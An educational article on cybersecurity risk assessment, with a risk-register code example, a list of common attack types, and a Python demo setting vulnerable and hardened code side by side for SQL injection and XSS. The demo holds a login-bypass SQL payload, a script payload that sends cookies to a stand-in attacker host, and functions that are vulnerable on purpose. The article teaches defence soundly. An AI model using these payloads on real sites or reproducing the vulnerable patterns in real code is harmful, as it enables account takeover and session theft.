Completing a risk assessment will allow an organization to allocate resources (time, money, and human capital) to reduce overall risk in an intelligent and strategic way. Cybersecurity defenses and controls should never be deployed arbitrarily; they should be deployed with the intention to reduce risk. Below are the basic steps taken to complete a risk assessment.
Sequential Steps Involved in Conducting a Risk Assessment
1. Identification: Determine all critical assets of the technology infrastructure. Next, identify the sensitive data that is created, stored, or transmitted by each of these assets. Create a risk profile for each asset.
2. Assessment: Apply a defined methodology to assess the security risks identified for the critical assets. The methodology must relate assets, threats, vulnerabilities, and existing (mitigating) controls to one another: a risk exists only where a threat can exploit a vulnerability in an asset that the current controls do not adequately cover, and its magnitude is a function of how likely that is and how severe the consequence would be. After careful evaluation, use the resulting scores to decide how to allocate time and resources toward mitigation effectively and efficiently.
3. Mitigation: Define a treatment for each risk (reduce it with controls, transfer it, avoid the activity, or formally accept it) and implement the chosen security controls, starting with the highest-scoring risks.
4. Prevention: Implement tools and processes (patching, hardening, monitoring, secure development practices) that keep new vulnerabilities from being introduced into your firm's resources and reduce the chance that threats succeed against them.
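The four steps above can be made concrete with a small risk register. The following is an added example written for this page, not code from the original article or from any assessment framework: it scores each asset/threat/vulnerability triple as likelihood x impact on an assumed 1-5 scale, applies controls that scale those factors, and spends a fixed budget on the controls that remove the most residual risk per unit of cost. The assets, scores, control costs and reduction factors are all constructed for the demonstration.

```python
# Added illustrative example: a minimal risk register that scores
# asset/threat/vulnerability triples, applies controls, and spends a
# fixed budget on the controls that buy the most risk reduction.
# All assets, scores, costs and reduction factors are constructed
# assumptions for the demo, not data from any real assessment.
from dataclasses import dataclass, field


@dataclass
class Control:
    name: str
    cost: int                 # abstract effort/money units to deploy
    likelihood_factor: float  # residual likelihood multiplier (0.2 == 80% reduction)
    impact_factor: float      # residual impact multiplier (1.0 == no change)


@dataclass
class Risk:
    asset: str
    threat: str
    vulnerability: str
    likelihood: int           # 1 (rare) .. 5 (almost certain), assumed scale
    impact: int               # 1 (negligible) .. 5 (severe), assumed scale
    candidates: tuple         # names of controls that would address this risk
    applied: list = field(default_factory=list)

    def inherent(self) -> float:
        """Score before any control is applied: likelihood x impact."""
        return float(self.likelihood * self.impact)

    def residual(self) -> float:
        """Score after each applied control scales likelihood and impact."""
        score = self.inherent()
        for c in self.applied:
            score *= c.likelihood_factor * c.impact_factor
        return score


# Constructed control catalogue; costs and factors are assumptions.
CONTROLS = {
    "MFA": Control("MFA", cost=2, likelihood_factor=0.2, impact_factor=1.0),
    "Offline backups": Control("Offline backups", cost=3, likelihood_factor=1.0, impact_factor=0.4),
    "WAF": Control("WAF", cost=1, likelihood_factor=0.5, impact_factor=1.0),
}


def build_register():
    """Step 1 (identification): constructed asset/threat/vulnerability triples."""
    return [
        Risk("customer database", "credential theft", "password-only admin login", 4, 5, ("MFA",)),
        Risk("file server", "ransomware", "no tested offline backups", 3, 5, ("Offline backups",)),
        Risk("public web app", "SQL injection", "string-built queries", 3, 4, ("WAF",)),
    ]


def prioritize(risks):
    """Step 2 (assessment): rank by current residual score, highest first."""
    return sorted(risks, key=lambda r: r.residual(), reverse=True)


def plan_mitigation(risks, controls, budget):
    """Step 3 (mitigation): greedily buy the control that removes the most
    residual risk per unit of cost until nothing affordable is left.
    Mutates the risks' applied lists; returns (asset, control) decisions."""
    decisions = []
    remaining = budget
    while True:
        best = None
        for r in risks:
            for name in r.candidates:
                c = controls[name]
                if c in r.applied or c.cost > remaining:
                    continue
                # Applying c multiplies the residual by lf*if, so this is the drop.
                reduction = r.residual() * (1 - c.likelihood_factor * c.impact_factor)
                value = reduction / c.cost
                if best is None or value > best[0]:
                    best = (value, r, c)
        if best is None:
            return decisions
        _, r, c = best
        r.applied.append(c)
        remaining -= c.cost
        decisions.append((r.asset, c.name))


if __name__ == "__main__":
    register = build_register()
    print("Before mitigation:")
    for r in prioritize(register):
        print(f"  {r.inherent():5.1f}  {r.asset}: {r.threat} via {r.vulnerability}")
    for asset, control in plan_mitigation(register, CONTROLS, budget=5):
        print(f"apply {control} to {asset}")
    print("After mitigation (whatever remains still needs a transfer/accept decision):")
    for r in prioritize(register):
        print(f"  {r.residual():5.1f}  {r.asset}")
```

With a budget of 5 the planner buys MFA for the database (largest reduction per unit) and the WAF for the web app, and cannot afford the backups; the file server's ransomware risk is then the highest residual score and is the one that must be explicitly transferred or accepted. Real methodologies use richer scales and likelihood models, but the shape of the decision (rank, treat the top of the list, record what is left) is the same.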
Different Types of Risk Events
1. Malware: Malware is unwanted software that is installed on a target system without the owner's consent and causes unexpected behavior. Its effects range from denying access to programs and deleting files to stealing information and spreading itself to other systems.
2. Password Theft: The familiar "I've been hacked!" moment, when you log in to an account only to find the password changed and your data gone. What has usually happened is that an unauthorized third party stole or guessed the password (through phishing, a breach of another site where the same password was reused, or brute-force guessing) and has since used the account freely. For an enterprise the stakes are higher, because a single stolen password can expose sensitive data.
3. Traffic Interception: Also known as "eavesdropping," traffic interception occurs when a third party "listens" to information sent between a user and a host. What is captured depends on the traffic, but the technique is commonly used to harvest logins or other valuable data. Unencrypted protocols make this trivial on any network segment the attacker can reach, which is why transport encryption (TLS) matters.
4. Phishing Attacks: Typically, an end user receives an email or message that requests sensitive data, such as a password, or links to a page that does. The phishing message often looks official, using legitimate-looking sender addresses and branding, which induces the recipient to click links and unknowingly hand over sensitive information.
5. DDoS: A Distributed Denial of Service attack is a method in which malicious parties flood a target server with traffic from many sources at once, often a botnet of compromised machines. When the server can no longer keep up with incoming requests, the website or service it hosts becomes unavailable or slows to unusable performance.
6. Cross Site Attack: Referred to as an XSS attack. An attacker targets a website that echoes user-supplied input into its pages without proper escaping; the flaw is missing output encoding, not missing encryption, so serving the site over HTTPS does not prevent it. The attacker's script is either stored on the site (in a comment, profile field, or similar) or reflected back through a crafted link. When a regular user loads the page, the script runs in their browser under the site's origin, where it can steal session tokens, perform actions as that user, or disrupt the site's normal behavior.
7. Zero-Day Exploits: A zero-day vulnerability is a security flaw that is unknown to the vendor, or for which no patch is yet available; a zero-day exploit is a targeted attack against a system, network, or software that takes advantage of it. Because no fix exists at the time of the attack, it can cause unusual behavior, damage data, or steal information, and signature-based defenses generally do not recognize it.
8. SQL Injection: An SQL injection attack manipulates the queries an application sends to its database so that the database returns, or modifies, data that was never meant to be accessible. It happens when user input is concatenated directly into the query text, so characters in the input (a quote, a comment marker, an extra clause) are parsed as SQL syntax rather than treated as data.
9. Social Engineering: Phishing is one form of social engineering, the umbrella term for deceiving people into giving away sensitive details or performing actions on the attacker's behalf. It can occur on any platform, and malicious parties often go to great lengths to succeed, for example by researching their targets on social media to make the pretext convincing.
10. MitM Attack: A Man-in-the-Middle attack occurs when a third party inserts itself into the communication between a client and a host, relaying and optionally altering the traffic so that each side believes it is talking directly to the other. The attacker typically gets into that position by spoofing addresses on the network (ARP or DNS spoofing) or by offering a rogue access point. For example, a user logging in to a bank over a connection the attacker controls would have their credentials and session data captured, unless the connection is protected by properly validated TLS, which is what makes such interception detectable.
11. Ransomware: A particularly damaging variant of malware. Once it runs on a user system or network, it encrypts files or locks systems, preventing access to functionality (in part or whole) until a "ransom" is paid to the attackers; many operators now also steal data first and threaten to publish it.
12. Cryptojacking: Cryptojacking installs malware (or injects script into a web page) that forces the infected system to perform "crypto-mining," a common way of earning cryptocurrency. Like other malware it spreads to unprotected systems. It is attractive to attackers because mining is hardware-intensive, so stealing the victim's CPU, GPU, and electricity is cheaper than paying for their own.
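Items 6 (XSS) and 8 (SQL injection) above share a single root cause: untrusted input is spliced as text into a structured language (HTML or SQL) and the interpreter cannot tell the attacker's syntax from the developer's. The following is an added example written for this page, not code from the original article: each flaw is shown in a vulnerable form next to its hardened form, run against the same constructed attacker input. The in-memory user rows, the payloads, and the `attacker.example` hostname are all constructed for the demonstration.

```python
# Added example: SQL injection and XSS, vulnerable vs. hardened.
# The database rows, payloads and attacker.example host are constructed.
import html
import sqlite3


def make_db():
    """Constructed in-memory user table for the demo (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "hunter2", 1), ("bob", "pa55w0rd", 0)])
    return conn


# --- SQL injection: query built by string formatting ----------------------

def login_vulnerable(conn, username, password):
    """Username and password are spliced into the SQL text, so quote
    characters in them change the structure of the query."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values as data, so the
    same payload is compared literally against the column and matches nothing."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# --- XSS: user input reflected into HTML --------------------------------

def render_comment_vulnerable(comment):
    """Inserts the comment verbatim, so any markup inside it is interpreted."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Escapes the HTML metacharacters (< > & and quotes) so the browser
    displays the text instead of executing it."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# Constructed attacker inputs.
# Closes the quoted literal, adds an always-true clause, comments out the rest.
SQLI_PAYLOAD = "' OR 1=1 --"
# Exfiltrates the document cookie to an attacker-controlled host (hypothetical).
XSS_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login with payload:", login_vulnerable(conn, SQLI_PAYLOAD, "x"))
    print("safe login with payload:     ", login_safe(conn, SQLI_PAYLOAD, "x"))
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
```

The vulnerable login returns the first user in the table ("alice", who happens to be an admin) without any password, because the `--` turns the rest of the WHERE clause into a comment; the parameterised version returns nothing. Likewise the unescaped comment ships a live `<script>` tag to every reader, while the escaped version renders it as harmless `&lt;script&gt;` text. Parameterised queries and context-appropriate output encoding are the fixes; a WAF can only reduce the likelihood of exploitation, which is why it was treated as a partial control in the register example above.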